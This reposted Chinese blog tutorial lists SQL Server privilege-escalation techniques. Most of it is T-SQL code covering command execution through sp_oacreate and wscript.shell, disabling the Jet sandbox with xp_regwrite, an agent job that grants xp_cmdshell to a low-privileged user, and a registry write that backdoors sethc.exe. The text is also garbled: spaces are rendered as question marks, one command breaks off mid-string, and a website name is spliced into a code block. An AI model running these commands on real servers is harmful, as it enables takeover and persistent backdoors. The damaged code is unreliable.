SQL Server从0到1——提权

发布时间:2024年01月08日

xp_cmdshell提权

xp_cmdshell在前面写webshell已经讲解过了,在这里不在重复

sp_oacreate提权

启用:
EXEC?sp_configure?'show?advanced?options',?1;
RECONFIGURE?WITH?OVERRIDE;
EXEC?sp_configure?'Ole?Automation?Procedures',?1;
RECONFIGURE?WITH?OVERRIDE;
关闭:
EXEC?sp_configure?'show?advanced?options',?1;
RECONFIGURE?WITH?OVERRIDE;
EXEC?sp_configure?'Ole?Automation?Procedures',?0;
RECONFIGURE?WITH?OVERRIDE;
执行:
declare?@shell?int?exec?sp_oacreate?'wscript.shell',@shell?output
exec?sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe?/c?whoami?>c:\\1.txt'

?

沙盒提权

1.?exec?master..xp_regwrite?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

2.?exec?master.dbo.xp_regread?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines',?'SandBoxMode'

沙盒模式SandBoxMode参数含义(默认是2)
`0`:在任何所有者中禁止启用安全模式
`1`?:为仅在允许范围内
`2`?:必须在access模式下
`3`:完全开启

执行命令:
Select?*?From?OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\i

?

public

USE?msdb
EXEC?sp_add_job?@job_name?=?'GetSystemOnSQL',?www.2cto.com
@enabled?=?1,
@description?=?'This?will?give?a?low?privileged?user?access?to
xp_cmdshell',
@delete_level?=?1
EXEC?sp_add_jobstep?@job_name?=?'GetSystemOnSQL',
@step_name?=?'Exec?my?sql',
@subsystem?=?'TSQL',
@command?=?'exec?master..xp_execresultset?N''select?''''exec
master..xp_cmdshell?"dir?>?c:\agent-job-results.txt"'''''',N''Master'''
EXEC?sp_add_jobserver?@job_name?=?'GetSystemOnSQL',
@server_name?=?'SERVER_NAME'
EXEC?sp_start_job?@job_name?=?'GetSystemOnSQL'

xp_regwrite

exec?master..xp_regwrite?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image?File?Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
文章来源:https://blog.csdn.net/2301_80520893/article/details/135339463
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
最新文章